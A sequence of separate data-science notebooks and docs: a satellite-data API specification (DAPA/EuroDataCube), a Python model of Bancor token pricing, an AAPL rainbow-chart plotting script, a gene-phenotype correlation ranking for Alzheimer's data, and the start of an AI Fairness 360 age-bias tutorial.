Our DAPA service endpoint is based on the EuroDataCube environment, which allows us to provide access to a wide range of datasets:
- Sentinel-1 GRD
- Sentinel-2 L1C and L2A
- Sentinel-3 OLCI and SLSTR
- Sentinel-5P L2
- Landsat-8 L1C (ESA archive)
- MODIS
- DEM
Please see the Jupyter Notebooks for working examples. You can also use the DAPA service endpoint from your own environment (e.g., local computer, server). But please make sure, you do not publish the DAPA service endpoint URL (DAPA_URL) as this is connected to your personal account.
**Please note:** Not any feature of the API is currently supported. The API might also not work with every dataset. It should work at least with Sentinel-1, Sentinel-2, Sentinel-3, and the Digital Elevation Model (DEM).
## Tutorials
We have made the following tutorials as Jupyter Notebooks available:
1. [DAPA Tutorial #1: Cube - Sentinel-2 - OGC Testbed 16](https://eurodatacube.com/marketplace/notebooks/contributions/DAPA/DAPA_Tutorial_1_-_Cube_-_Sentinel-2.ipynb)
2. [DAPA Tutorial #2: Area - Sentinel-2 - OGC Testbed 16](https://eurodatacube.com/marketplace/notebooks/contributions/DAPA/DAPA_Tutorial_2_-_Area_-_Sentinel-2.ipynb)
3. [DAPA Tutorial #3: Timeseries - Sentinel-2 - OGC Testbed 16](https://eurodatacube.com/marketplace/notebooks/contributions/DAPA/DAPA_Tutorial_3_-_Timeseries_-_Sentinel-2.ipynb)
4. [DAPA Tutorial #4: Value - Sentinel-2 - OGC Testbed 16](https://eurodatacube.com/marketplace/notebooks/contributions/DAPA/DAPA_Tutorial_4_-_Value_-_Sentinel-2.ipynb)
5. [DAPA Tutorial #5: DEM example – OGC Testbed 16](https://eurodatacube.com/marketplace/notebooks/contributions/DAPA/DAPA_Tutorial_5_-_DEM.ipynb)
## Documentation
This API definition has been developed by EOX and DLR. This definition focuses on the provision of raster/coverage data, but might also be applied for scattered time-series data.
**Please note:** This is an early draft proposal of the API definition. It is subject to change within the time frame of OGC Testbed 16. Also other proposals exist with different API definitions.
**Overview of URL endpoints:**
/oapi/collections/{collection}/dapa/
fields/
cube/
area/
timeseries/
area/
position/
value/
area/
position/
The first hierarchy level after /dapa/ describes the output type of the data requested (except for "fields"):
- cube: 2d raster time-series (each with one or multiple bands)
- area: Single 2d raster (with one or multiple bands)
- timeseries: 1d time-series (each with values from one or multiple fields)
- value: Single value (with values from one or multiple fields)
The second hierarchy level after /dapa/ describes the input geometry (if not implicitly given from the output type):
- area: Polygon/Bounding box
- position: Point
With this definition, aggregation is automatically conducted based on the `aggregate` parameter to achieve
the output type requested (see the Parameter section below).
### /collections/{collection}/dapa/fields
Output fields/variables/properties/bands to be included in the request/processing/aggregation.
The `fields` parameter for the DAPA request can consists values either from the selected collection (e.g., all band
names from Sentinel-2) or declared dynamically (e.g., bands algebra NDVI=(B08-B04/B08+B04)) (see the Parameter
section below).
### /collections/{collection}/dapa/cube
**2d raster time-series** (each with one or multiple bands)
- Available only if the collection is a multi-temporal raster dataset.
**Parameters:**
- bbox/geom/cell
- time
- (fields) defaults to all fields (bands) available
- format
**Example UC 1.1:** Produce an animated video of ozone concentration from Sentinel-5p for a given time and space
/collections/S5PL2/dapa/cube?time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z&bbox=11.49,48.05,11.66,48.22&fields=SO2&format=video/avi
Results in an animated video.
**Example UC 2.1:** Retrieve a raster time-series of NDVI calculated from Sentinel-2 scenes for a given time and space
/collections/S2L1C/dapa/cube?time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z&bbox=11.49,48.05,11.66,48.22&fields=NDVI=(B08-B04/B08+B04)&format
=application/metalink
Results in a metalink file with download links to multiple raster files (one per time).
### /collections/{collection}/dapa/area
**Single 2d raster** (e.g., results in TIFF with num(aggregates) x num(fields) bands)
- If the collection is a **multi-temporal raster dataset**, **aggregation over time** is automatically conducted
based on the `aggregate` parameter.
- If the collection is a **single raster dataset**, **no aggregation over time** is conducted.
**Parameters:**
- bbox/geom/cell
- time
- aggregate
- (fields) defaults to all fields (bands) available
- (format) defaults to image/tiff
**Example UC 1.2:** Retrieve the maximum sulphur dioxide concentration in a given time span as a single coverage
(aggregation over time)
/collections/S5PL2/dapa/area?time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z&bbox=11.49,48.05,11.66,48.22&aggregate=max&fields=SO2
Results in TIFF with a single field/band: SO2_max
**Example UC 2.2:** Retrieve the minimum and maximum NDVI and NDBI in a given time span (aggregation over time)
/collections/S2L2A/dapa/area?time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z&bbox=11.49,48.05,11.66,48.22&aggregate=min,max&fields=NDVI=(B04-B08)/(B04+B08),NDBI=(B01-B02)/(B01+B02)
Results in TIFF with 4 fields/bands: NDVI_min, NDVI_max, NDBI_min, NDBI_max.
### /collections/{collection}/dapa/timeseries
#### /collections/{collection}/dapa/timeseries/area
**1d time-series** (each with values from one or multiple fields)
- If the collection is a **multi-temporal raster dataset**, **aggregation over space** is automatically conducted
based on the `aggregate` parameter.
- Can not be used for a single raster dataset
**Parameters:**
- bbox/geom/cell
- time
- aggregate
- (fields) defaults to all fields (bands) available
- (format) defaults to text/csv
**Example UC 1.3:** Retrieve the maximum sulphur dioxide concentration in a given area as a time-series (aggregation
over space)
/collections/S5PL2/dapa/timeseries/area?time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z&bbox=11.49,48.05,11.66,48.22&aggregate=max&fields=SO2
Results in CSV with two columns: date and SO2_max
#### /collections/{collection}/dapa/timeseries/position
**1d time-series** (each with values from one or multiple fields)
- Extraction of a time series at a point specified in the request
- No aggregation is conducted because only a single pixel is extracted
- Can not be used for a single raster dataset
**Parameters:**
- point
- time
- (fields) defaults to all fields (bands) available
- (format) defaults to text/csv
**Example UC 1.3:** Retrieve the sulphur dioxide concentration at a given point as a time-series
    /collections/S5PL2/dapa/timeseries/position?time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z&point=11.49,48.05&fields=SO2
Results in CSV with two columns: date and SO2
### /collections/{collection}/dapa/value
#### /collections/{collection}/dapa/value/area
**Single value** (with values from one or multiple fields)
- If the collection is a multi-temporal dataset, **aggregation over space and time** is automatically conducted based on
the `aggregate` parameter.
- If the collection is a single dataset/coverage, **aggregation over space** is automatically conducted based on
the `aggregate` parameter.
**Note:** If multiple methods are given in the `aggregate` parameter or multiple `fields` are given, text/plain is not
sufficient! `TODO`
**Parameters:**
- bbox/geom/cell
- time
- aggregate
- (fields) defaults to all fields (bands) available
- (format) defaults to text/plain
**Example:** Retrieve the minimum sulphur dioxide concentration in a given area and time span (aggregated over space and
time)
/collections/S5PL2/value/area?time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z&bbox=11.49,48.05,11.66,48.22&aggregate=min&fields=SO2&format=text/plain
Results in a single value
#### /collections/{collection}/dapa/value/position
**Single value** (with values from one or multiple fields)
- If the collection is a **multi-temporal raster dataset**, **aggregation over time** is automatically conducted
based on the `aggregate` parameter.
- If the collection is a **single raster dataset**, **no aggregation** is conducted.
**Note:** If multiple methods are given in the `aggregate` parameter or multiple `fields` are given, text/plain is not
sufficient! `TODO`
**Parameters:**
- point
- time
- aggregate
- (fields) defaults to all fields (bands) available
- (format) defaults to text/plain
**Example:** Retrieve the minimum value of all fields (bands) of Sentinel-5p at a given point in a given time
span (aggregated over time).
/collections/S5PL2/value/position?time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z&point=11.49,48.05&aggregate=min&format=application/json
Results in JSON file with a single value for each field (band): SO2_min, O3_min, NO2_min, ...
### Parameters
#### `point`
Specific location in `x,y`, WKT (?), or reference to point (Link to feature?) `TODO`
**Example:**
&point=14.2,15.3
#### `bbox`
Bounding box in `minx,miny,maxx,maxy` or reference to geometry (Link to feature?) `TODO`
**Example:**
&bbox=12.3,0.3,14.4,2.3
### `geom`
WKT geometry or reference to geometry (Link to feature?) `TODO`
**Example:**
&geom=POLYGON ((...))
#### `time`
Time point or time span
**Examples:**
Start/End
&time=2018-05-04T12:12:12Z/2018-06-04T12:12:12Z
Instant
&time=2018-05-04T12:12:12Z
Start and period after (not yet supported)
&time=2018-05-04T12:12:12Z/P5D
End and period before (not yet supported)
&time=P5D/2018-05-04T12:12:12Z
Whole day
&time=2018-05-04
Whole month
&time=2018-05
Whole year
&time=2018
#### `fields`
Comma-separated list of fields, derived (calculated) fields are possible
**Syntax:**
field-parameter = field-selection , { ',' , field-selection }
field-selection = identifier | ( identifier , '=' , expression )
**Please note:** + sign need to be URL encoded to %2B
**Examples:**
Listing:
&fields=B04,B08
Simple aliasing:
&fields=NIR=B08,RED=B04
Derived field:
&fields=NDVI=(B04-B08)/(B04+B08)
Combined example:
&fields=NIR=B08,RED=B04,NDVI=(RED-NIR)/(RED+NIR)
#### `aggregate`
Specify aggregation
**Syntax:**
aggregate-param = method { ',' , method }
method = identifier [ '(' , method-arg , ')' ]
**Examples:**
Aggregation (min+max)
aggregate=max,min
Aggregation (min+max+linear average) (`avg(linear)` not yet supported - only avg)
aggregate=max,min,avg(linear)
#### `cql` (not yet supported)
Metadata filter using CQL
**Example:**
cql=cloudCover < 0.5
#### `datafilter` (not yet supported)
**Syntax:**
datafilter-parameter = datafilter , { ',' , datafilter }
datafilter = boolean-expression
**Example:**
datafilter=area(NDVI > 1) >= 0.5
#### `format` (not yet supported)
##### cube formats (~3D)
- AVI
- application/x-netcdf
- application/metalink
- WCS-EO DatsetSeries / CIS
##### coverage (~2D)
- image/tiff
##### timeseries (~1D)
- text/csv
- application/json
##### value (~0D)
- text/plain
- application/json
| github_jupyter |
# The Bancor Protocol
Based on the whitepaper from: Eyal Hertzog, Guy Benartzi, Galia Benartzi, "The Bancor Protocol" March, 2018
8/22/18
Written for: [Horuspay.io](https://horuspay.io/)
By: gunnar pope
* github: https://github.com/gunnarpope
* email: gunnarpope@gmail.com
Forward: This script is intended to explore and expand upon the brilliance of the Bancor Protocol Algorithm presented by Hertzog, et al. Any critiques provided below are intended to build upon and clarify their work. -gp
### Definitions and notes on the Bancor Algorithm:
* $TOK$ is your native Smart Token symbol, which could be HORUS for example
* $CTOK$ is the connector token that you wish to transfer, which could be EOS, BTC, or even ETH, if desired.
* [USD/TOK] the brackets indicate only the units of the variable, in this case the unit is USD/TOK
* From the whitepaper, "The price of a Smart Token is denominated in the connected token (for example, the price of BNT is denominated in ETH, its connected token"
* 'The bancor formula is built upon the idea that the smart contract maintains a ratio between the total value and the connector balance, the connector weight.'
### Total Smart Token Supply
The Smart Token Total Supply, $totalTOKsupply$, is the maximum amount of Smart Tokens of your contract to ever be created.
### Smart Token Market Cap
The total market capitalization of the Smart Token, $TOK$, is the total value of the $TOK$ market, in reference of the connector token, $CTOK$. The $TOKmarketCap$ variable must be in units of [CTOK] for $CW$ to be a unitless number. Therefore, the whitepaper formula for $TOKmarketCap$ should be modified to be:
$$TOKmarketcap [CTOK]= price [CTOK/TOK]*totalTOKsupply[TOK]$$
For instance, if the total supply of EOS ever created was 1000 EOS, then the $TOKmarketcap$ would be:
$$ TOKmarketcap = 0.00074823558[BTC/EOS] * 1000 EOS = 0.74824 BTC $$.
### Connector Weight
From the Price Formula algorithms:
$$ CW = \frac{CTOKbalance [CTOK]}{TOKmarketcap [CTOK]}$$
where:
Where, $CTOKbalance$ is the balance of the tokens in the connector account.
A few small notes:
* The whitepaper states that: "The CW is expressed as a percentage greater than 0% and up to 100%, and as mentioned, is initially set by the creator when a Smart Token is configured."
If this were true, and $CTOKbalance$ and $TOKmarketcap$ are of the same units, then the equation for $CW$ would have to be:
$$ CW = \frac{CTOKbalance [CTOK]}{TOKmarketcap [CTOK]}*100$$
But this would scale $price$ calculation to be artificially low (I think), so it is probably ranging between $0 < CW < 1$.
### Smart Token Price
The price of the smart token is denominated in (referenced to) the connector token. For example, if EOS is the Smart token and BTC is the connector token, and 1 EOS = 0.00074823558 BTC, then the units of $price$ are:
$$ price = 0.00074823558 [BTC/EOS]$$.
In reference to this algorithm, the units of price are.
$$ price = XX.XXXX [CTOK/TOK]$$
Solve for the Smart Token's price as a function of it's connector weight, $CW$, connector balance, $CTOKbalance$, and Smart Token supply, $TOKsupply$. The $Smart Token Outstanding Supply$ is not defined in the Bancor whitepaper, but we're assuming it represents available supply of $TOK$ to the smart contract, $TOKsupply$. This $TOKsupply$ would have to be a liquid balance of $TOK$, owned by the Smart Contract administrators, to be usefully traded.
$$ price [CTOK/TOK] = \frac{CTOKBalance [CTOK]}{TOKsupply [TOK]*CW}$$
This formula implies that if there is a large outstanding supply (low demand), the token will be worth a fraction of it's marketcap price and if only a few tokens are available in supply (high demand), each token will be worth nearly the marketcap price.
#### Tokens Issued
$$ TOKissued [TOK] = TOKsupply [TOK]*\big(\big(1+\frac{CTOKreceived [CTOK]}{CTOKbalance [CTOK]}\big)^{CW}-1\big)$$
This is the amount of Smart Tokens to payout given the current smart token supply, $TOKsupply$, the connected tokens paid, $CTOKreceived$, and the balance of $CTOK$ tokens in the bancor account, $CTOKbalance$.
$$ CTOKissued = CTOKbalance * ((1+ \frac{TOKreceived}{TOKsupply})^{\frac{1}{CW}}-1) $$
The effective price can be calculated as:
$$ effectivePrice [CTOK/TOK] = \frac{CTOKexchanged [CTOK]}{TOKexchanged [TOK]}$$
The $effectivePrice$ represents the effective exchange rate of the transaction, in units of $[CTOK/TOK]$
```
# The Bancor Algorithm and testing
class smart_token:
    """Bancor Smart Token: a symbol plus circulating and total supply figures."""

    def __init__(self, name, supply, totalsupply):
        self.name = name                  # token symbol, e.g. "TOK"
        self.supply = supply              # circulating supply [TOK]
        self.totalsupply = totalsupply    # total TOK ever created

    def printtok(self):
        """Dump the token's state to stdout."""
        rows = (
            ("Token Stats:",),
            ("Token: ", self.name),
            ("Supply: ", self.supply),
            ("totalsupply: ", self.totalsupply),
        )
        for row in rows:
            print(*row)
class connector:
    """Connector token account: a symbol and the balance held by the contract."""

    def __init__(self, tokenname, balance):
        self.token = tokenname    # connector token symbol, e.g. "CTOK"
        self.balance = balance    # connector balance [CTOK]

    def printcon(self):
        """Dump the connector's state to stdout."""
        for row in (("Connector Stats:",),
                    ("Token: ", self.token),
                    ("Balance: ", self.balance)):
            print(*row)
class BancorExchange:
    """Bancor converter between a Smart Token (TOK) and a connector token (CTOK).

    Holds the connector weight CW, the last quoted price [CTOK/TOK] and the
    effective price of the last trade; CW is re-derived after every conversion.
    """

    def __init__(self, CW):
        self.CW = CW                   # connector weight (0 < CW <= 1)
        self.price = 0.0               # last quoted price [CTOK/TOK]
        self.effective_price = 0.0     # effective rate of the last trade

    def printf(self):
        """Print the current connector weight and quoted price."""
        print("CW: ", self.CW)
        print("Price: ", self.price)

    def CTOKtoTOK(self, tok, ctok, CTOKreceived):
        """Deposit `CTOKreceived` connector tokens and issue Smart Tokens.

        Mutates `tok.supply` (down) and `ctok.balance` (up), refreshes
        `self.effective_price` and `self.CW`, and returns the TOK issued.
        """
        # NOTE(review): issuance is computed from tok.totalsupply while
        # getprice() uses tok.supply; the whitepaper formula is stated in
        # terms of the outstanding supply -- confirm which is intended.
        TOKsupply = tok.totalsupply
        # quote the current price [CTOK/TOK]
        self.price = self.getprice(tok, ctok)
        # market cap at the quoted price (kept for inspection/debugging)
        marketcap = self.marketcap(self.price, tok.totalsupply)
        # BUG FIX: previously passed the module-level `CW` global; use the
        # instance's connector weight, which is updated after every trade.
        TOKissued = self.TOKissued(TOKsupply, ctok.balance, CTOKreceived, self.CW)
        # settle the trade: issued TOK leaves the supply, the deposit is banked
        tok.supply -= TOKissued
        ctok.balance += CTOKreceived
        # effective exchange rate of this trade [CTOK/TOK]
        self.effective_price = CTOKreceived/ (1.0*TOKissued)
        # re-derive the market cap at the effective price and refresh CW
        newmarketcap = self.marketcap(self.effective_price, tok.totalsupply)
        self.CW = self.updateCW(ctok.balance, newmarketcap)
        return (TOKissued)

    def TOKtoCTOK(self, tok, ctok, TOKreceived):
        """Deposit `TOKreceived` Smart Tokens and pay out connector tokens.

        Mutates `ctok.balance` (down) and `tok.supply` (up), refreshes
        `self.effective_price` and `self.CW`, and returns the CTOK issued.
        """
        self.price = self.getprice(tok, ctok)
        marketcap = self.marketcap(self.price, tok.totalsupply)
        # BUG FIX: previously passed the module-level `CW` global; use self.CW.
        CTOKissued = self.CTOKissued(tok.totalsupply, ctok.balance, TOKreceived, self.CW)
        # settle the trade: CTOK leaves the connector, TOK returns to supply
        ctok.balance -= CTOKissued
        tok.supply += TOKreceived
        # effective exchange rate of this trade [CTOK/TOK]
        self.effective_price = CTOKissued/ (1.0*TOKreceived)
        # re-derive the market cap at the effective price and refresh CW
        newmarketcap = self.marketcap(self.effective_price, tok.totalsupply)
        self.CW = self.updateCW(ctok.balance, newmarketcap)
        return (CTOKissued)

    def updateCW(self, CTOKbalance, TOKmarketcap):
        """CW = connector balance / Smart Token market cap (both in [CTOK])."""
        CW = CTOKbalance / TOKmarketcap
        return (CW)

    def getprice(self, tok, ctok):
        """price [CTOK/TOK] = CTOKbalance / (circulating TOK supply * CW)."""
        balance = ctok.balance
        TOKsupply = tok.supply
        price = balance/(TOKsupply*self.CW)
        # print("Price [EOS/HOR]:", price)
        return ( price )

    def marketcap(self,price, totalTOKsupply):
        """Market cap [CTOK] = price [CTOK/TOK] * total TOK supply [TOK]."""
        marketcap = price * totalTOKsupply
        return ( marketcap )

    def CTOKissued(self, TOKsupply, CTOKbalance, TOKreceived, CW ):
        """CTOK paid out: CTOKbalance * ((1 + TOKreceived/TOKsupply)^(1/CW) - 1)."""
        ctokissued = CTOKbalance * (( 1 + TOKreceived/TOKsupply)**(1/CW)-1 )
        return ( ctokissued )

    def TOKissued(self, TOKsupply, CTOKbalance, CTOKreceived, CW):
        """TOK issued: TOKsupply * ((1 + CTOKreceived/CTOKbalance)^CW - 1)."""
        tokensissued = TOKsupply*( (1+CTOKreceived/CTOKbalance)**(CW) -1)
        return( tokensissued )
###########################################
# eoscon.price = 1
# eoscon.get_balanceValue()
# find the supply of HORUS on the EOS MAINNET
# $ cleos --url https://api.eosnewyork.io:443 get currency stats horustokenio "HORUS"
# {
#   "HORUS": {
#     "supply": "1200000000.0000 HORUS",
#     "max_supply": "1200000000.0000 HORUS",
#     "issuer": "horustokenio"
#   }
# Demo: repeatedly convert 10 EOS into HORUS and print how the issued
# amount, balances, CW and effective price evolve trade by trade.
HORUSsupply = 1000.0000    # total HORUS created [TOK]
HORUScirc = 1000.0000      # circulating HORUS supply [TOK]
# horus_supply = np.linspace(1000,2000,1000)
horus = smart_token("HORUS", HORUScirc, HORUSsupply)
EOSbalance = 250 #0.5*bancor.get_tokmarketcap(horus,eoscon) # this creates a CW of 0.50
eos = connector("EOS",EOSbalance)
CW = 0.50                  # initial connector weight
exchange = BancorExchange(CW)
print("TOKsupply:\t", horus.supply)
print("EOSbalance\t", eos.balance)
CTOKrecieved = 10          # EOS deposited per trade [CTOK]
for i in list(range(10)):
    # each iteration deposits 10 EOS and issues HORUS at the current price
    TOKissued = exchange.CTOKtoTOK(tok=horus,ctok=eos,CTOKreceived=CTOKrecieved)
    print()
    print("TOK Issued:\t", TOKissued)
    print("TOKsupply:\t", horus.supply)
    print("EOSbalance:\t", eos.balance)
    print("CW:\t\t", exchange.CW)
    print("Effective Price: ", exchange.effective_price)
```
## Conclusion:
The example above works perfectly according to the whitepaper.
### Test: EOS->HORUS
Start with an initial balance of 2000 HORUS and 250 EOS and observe how the price of HORUS changes with each exchange from EOS to Horus.
```
import numpy as np
import matplotlib.pyplot as plt

# Sweep several connector weights; for each, repeatedly exchange 10 EOS for
# HORUS until the circulating supply drains from 2000 down to 1000, and plot
# the resulting price curve against the remaining supply.
for CW in [0.1, 0.25, 0.50, 0.75, 0.90]:
    ex = BancorExchange(CW)
    HORUSsupply = 2000.0000   # total HORUS created [TOK]
    HORUScirc = 2000.0000     # circulating supply at the start [TOK]
    # horus_supply = np.linspace(1000,2000,1000)
    horus = smart_token("HORUS", HORUScirc, HORUSsupply)
    EOSbalance = 250 #0.5*bancor.get_tokmarketcap(horus,eoscon) # this creates a CW of 0.50
    eos = connector("EOS",EOSbalance)
    price = []         # sampled prices (inverted below)
    hsupplylist = []   # matching supply samples [TOK]
    hsupply = horus.supply
    while (hsupply > 1000):
        # print("TOKsupply:\t", horus.supply)
        # print("EOSbalance\t", eos.balance)
        CTOKrecieved = 10
        TOKissued = ex.CTOKtoTOK(tok=horus,ctok=eos,CTOKreceived=CTOKrecieved)
        hsupplylist.append(horus.supply)
        # price.append(ex.price)
        price.append(1/ex.price) # flip units to [Horus/EOS]. Correct?
        hsupply = horus.supply
    # one figure per connector weight
    plt.figure(figsize=(10,4))
    plt.plot(hsupplylist, price,'r', linewidth=2,label="CW= "+str(CW))
    plt.title("Pricing vs TOK Supply")
    plt.legend()
    plt.ylabel("Price [CTOK/TOK]")
    plt.xlabel("Supply [TOK]")
    # plt.axis([900,2100,0,1.5])
    plt.grid(True)
    plt.show()
```
### Test: HORUS->EOS
Start with an initial balance of 1000 HORUS and 250 EOS and observe how the price of HORUS changes with each exchange from HORUS to EOS.
```
import numpy as np
import matplotlib.pyplot as plt

# Reverse direction: for each connector weight, repeatedly sell 10 HORUS for
# EOS until the circulating supply grows from 1000 back to 2000, and plot the
# resulting price curve against supply.
for CW in [0.1, 0.25, 0.50, 0.75, 0.90]:
    ex = BancorExchange(CW)
    HORUSsupply = 2000.0000   # total HORUS created [TOK]
    HORUScirc = 1000.0000     # circulating supply at the start [TOK]
    # horus_supply = np.linspace(1000,2000,1000)
    horus = smart_token("HORUS", HORUScirc, HORUSsupply)
    EOSbalance = 250 #0.5*bancor.get_tokmarketcap(horus,eoscon) # this creates a CW of 0.50
    eos = connector("EOS",EOSbalance)
    price = []         # sampled prices (inverted below)
    hsupplylist = []   # matching supply samples [TOK]
    hsupply = horus.supply
    while (hsupply < 2000):
        TOKrecieved = 10
        CTOKissued = ex.TOKtoCTOK(tok=horus, ctok=eos, TOKreceived=TOKrecieved)
        # print(CTOKissued)
        hsupplylist.append(horus.supply)
        # price.append(ex.price)
        price.append(1/ex.price) # this flips the units to [Horus/EOS]. Correct?
        hsupply = horus.supply
    # one figure per connector weight
    plt.figure(figsize=(10,4))
    plt.plot(hsupplylist, price,'r', linewidth=2,label="CW= "+str(CW))
    plt.title("Pricing vs TOK Supply")
    plt.legend()
    plt.ylabel("Price [CTOK/TOK]")
    plt.xlabel("Supply [TOK]")
    # plt.axis([900,2100,0,1.5])
    plt.grid(True)
    plt.show()
```
## Conclusion
The basics of the bancor algorithm are listed above. These plots don't quite match the Bancor whitepaper exactly so we should see where their algorithm differs from ours. Some of the initial balance values will make the plots differ in their scale, but the shape should be similar.
### ToDo:
* Incorporate the 10 day time lag into the formula
* Produce some test cases to make sure the algorithm works
* code it up in EOS!
| github_jupyter |
# Rainbow Charts
http://www.binarytribune.com/forex-trading-indicators/rainbow-charts
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings("ignore")

# fix_yahoo_finance is used to fetch data
# NOTE(review): fix_yahoo_finance was later renamed to yfinance; this import
# requires the legacy package -- confirm the pinned dependency.
import fix_yahoo_finance as yf
yf.pdr_override()

# input: ticker and date range to download
symbol = 'AAPL'
start = '2018-08-01'
end = '2019-01-01'

# Read data
df = yf.download(symbol,start,end)

# View Columns
df.head()

# Rainbow chart: a cascade of 2-period moving averages, each band smoothing
# the previous one.
# R=red, O=orange, Y=yellow, G=green, B=blue, I = indigo, and V=violet
df['Red'] = df['Adj Close'].rolling(2).mean()
df['Orange'] = df['Red'].rolling(2).mean()
df['Yellow'] = df['Orange'].rolling(2).mean()
df['Green'] = df['Yellow'].rolling(2).mean()
df['Blue'] = df['Green'].rolling(2).mean()
df['Indigo'] = df['Blue'].rolling(2).mean()
df['Violet'] = df['Indigo'].rolling(2).mean()
# drop the leading NaNs introduced by the rolling windows
df = df.dropna()

colors = ['k','r', 'orange', 'yellow', 'g', 'b', 'indigo', 'violet']
# NOTE(review): pandas' plot API documents `color=`; `colors=` relies on an
# older pandas accepting it -- confirm against the installed pandas version.
df[['Adj Close','Red','Orange','Yellow','Green','Blue','Indigo','Violet']].plot(colors=colors, figsize=(18,12))
# shade the daily low-high band and step-plot its edges
plt.fill_between(df.index, df['Low'], df['High'], color='grey', alpha=0.4)
plt.plot(df['Low'], c='darkred', linestyle='--', drawstyle="steps")
plt.plot(df['High'], c='forestgreen', linestyle='--', drawstyle="steps")
plt.title('Rainbow Charts')
plt.legend(loc='best')
plt.xlabel('Date')
plt.ylabel('Price')
plt.show()
```
## Candlestick with Rainbow
```
from matplotlib import dates as mdates
import datetime as dt

# Work on a copy so the original frame keeps its DatetimeIndex.
dfc = df.copy()
# up-day flag used to color the volume bars
dfc['VolumePositive'] = dfc['Open'] < dfc['Adj Close']
#dfc = dfc.dropna()
dfc = dfc.reset_index()
# candlestick_ohlc needs matplotlib date numbers, not timestamps
dfc['Date'] = mdates.date2num(dfc['Date'].astype(dt.date))
dfc.head()

from mpl_finance import candlestick_ohlc
fig, ax1 = plt.subplots(figsize=(20,12))
candlestick_ohlc(ax1,dfc.values, width=0.5, colorup='g', colordown='r', alpha=1.0)
#colors = ['red', 'orange', 'yellow', 'green', 'blue', 'indigo', 'violet']
#labels = ['Red', 'Orange', 'Yellow', 'Green', 'Blue', 'Indigo', 'Violet']
# Overlay each rainbow band; the column name doubles as the matplotlib color.
for i in dfc[['Red', 'Orange', 'Yellow', 'Green', 'Blue', 'Indigo', 'Violet']]:
    ax1.plot(dfc['Date'], dfc[i], color=i, label=i)
ax1.xaxis_date()
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%d-%m-%Y'))
ax1.grid(True, which='both')
ax1.minorticks_on()
# Secondary axis: volume bars colored green on up days, red on down days.
ax1v = ax1.twinx()
colors = dfc.VolumePositive.map({True: 'g', False: 'r'})
ax1v.bar(dfc.Date, dfc['Volume'], color=colors, alpha=0.4)
ax1v.axes.yaxis.set_ticklabels([])
# scale volume to the lower third of the chart
ax1v.set_ylim(0, 3*df.Volume.max())
ax1.set_title('Stock '+ symbol +' Closing Price')
ax1.set_ylabel('Price')
ax1.set_xlabel('Date')
ax1.legend(loc='best')
```
| github_jupyter |
# Correlation-based gene rankings
We compute the correlation coeffients between each gene and each phenotype - we then average across all phenotypes.
```
import gc
import h5py
import numpy as np
import pandas as pd
import os
import statsmodels.api as sm
from scipy import stats
from scipy.stats import spearmanr, pearsonr, rankdata
import matplotlib
import pickle
import sys
from matplotlib import pyplot as plt
import matplotlib as mpl
%matplotlib inline
import seaborn as sns
from functools import reduce
import numpy.ma as ma
path_to_configs = "../"
sys.path.append(path_to_configs)
from configs import *
with h5py.File(path_to_configs + path_to_MDAD_data_folders + "ACT_MSBBRNA_ROSMAP.h5", 'r') as hf:
gene_symbols = hf["gene_symbols"][:].astype(str)
ge = hf["ge"][:]
Y = hf["labels"][:]
labels_names= hf["labels_names"][:].astype(str)
print(list(hf.keys()))
labels_df = pd.DataFrame(Y, columns=labels_names.astype(str), dtype="str")
path_to_save_scores = path_to_save_scores = path_to_configs + path_to_gene_rankings + "Correlations/"
phenotypes = ["CERAD", "BRAAK", "PLAQUES", "TANGLES", "ABETA_IHC", "TAU_IHC"]
rs_phen = {}
ps_phen = {}
for phenotype in phenotypes:
print(phenotype)
a=ma.masked_invalid(labels_df[phenotype].astype(float))
rs = []
ps = []
for row in ge.T:
b=ma.masked_invalid(row)
msk = (~a.mask & ~b.mask)
r,p = stats.pearsonr(a[msk],b[msk])
rs.append(r)
ps.append(p)
rs_phen[phenotype]=rs
ps_phen[phenotype]=ps
phen_dict = {"all": ['CERAD','BRAAK','PLAQUES','TANGLES','ABETA_IHC','TAU_IHC'],
"abeta": ['CERAD','PLAQUES','ABETA_IHC'],
"tau": ['BRAAK','TANGLES','TAU_IHC']}
RANK_DF = pd.DataFrame.from_dict(rs_phen)
RANK_DF["gene"] = gene_symbols
for phen in phenotypes:
RANK_DF["%s_percentiles"%phen] = RANK_DF[phen].rank(pct=True)
for phen_group in phen_dict:
RANK_DF["%s-related_score"%phen_group] = RANK_DF[["%s_percentiles"%x for x in phen_dict[phen_group]]].mean(axis=1).rank(pct=True)
RANK_DF["%s-related_score"%phen_group] = RANK_DF["%s-related_score"%phen_group] - np.min(RANK_DF["%s-related_score"%phen_group])
### SAVE rnk FILES (used for gseapy)
### SAVE FINAL RANKINGS FOR EACH PHENOTYPE AND COMBINED ACROSS GROUPS
if not os.path.isdir(path_to_save_scores):
os.makedirs(path_to_save_scores)
for p_group in ["all", "abeta", "tau"]:
scores_df = RANK_DF[["gene","%s-related_score"%p_group]].sort_values("%s-related_score"%p_group, ascending=False)
scores_df = scores_df.reset_index(drop=True)
scores_df.to_csv("%s%s-related.rnk"%(path_to_save_scores,p_group), sep="\t", header=False, index=False)
RANK_DF.to_csv(path_to_save_scores + "ALL_CONSENSUS_SCORES.csv")
print("Saved rankings to %s"%path_to_save_scores)
```
| github_jupyter |
# Detecting and mitigating age bias on credit decisions
The goal of this tutorial is to introduce the basic functionality of AI Fairness 360 to an interested developer who may not have a background in bias detection and mitigation.
### Biases and Machine Learning
A machine learning model makes predictions of an outcome for a particular instance. (Given an instance of a loan application, predict if the applicant will repay the loan.) The model makes these predictions based on a training dataset, where many other instances (other loan applications) and actual outcomes (whether they repaid) are provided. Thus, a machine learning algorithm will attempt to find patterns, or generalizations, in the training dataset to use when a prediction for a new instance is needed. (For example, one pattern it might discover is "if a person has salary > USD 40K and has outstanding debt < USD 5, they will repay the loan".) In many domains this technique, called supervised machine learning, has worked very well.
